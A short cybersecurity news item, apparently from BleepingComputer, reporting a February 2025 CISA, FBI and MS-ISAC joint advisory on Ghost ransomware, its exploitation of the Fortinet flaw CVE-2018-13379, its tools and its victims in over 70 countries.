Right after Amigo_A and Swisscom's CSIRT team first spotted Ghost ransomware in early 2021, their operators were dropping custom Mimikatz samples, followed by CobaltStrike beacons, and deploying ransomware payloads using the legitimate Windows CertUtil certificate manager to bypass security software. Ghost ransomware operators frequently rotate their malware executables, change the file extensions of encrypted files, alter the contents of their ransom notes, and utilize multiple email addresses for ransom communications, which has often led to fluctuating attribution of the group over time. "Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware," CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) said in a joint advisory released on Wednesday. The joint advisory issued by CISA, the FBI, and MS-ISAC today also includes indicators of compromise (IOCs), tactics, techniques, and procedures (TTPs), and detection methods linked to previous Ghost ransomware activity identified during FBI investigations as recently as January 2025. In addition to being exploited for initial access in Ghost ransomware attacks, state-backed hacking groups that scanned for vulnerable Fortinet SSL VPN appliances also targeted the CVE-2018-13379 vulnerability. CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations. Fortinet warned customers to patch their SSL VPN appliances against CVE-2018-13379 multiple times in August 2019, July 2020, November 2020, and again in April 2021.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Wed, 19 Feb 2025 21:00:11 +0000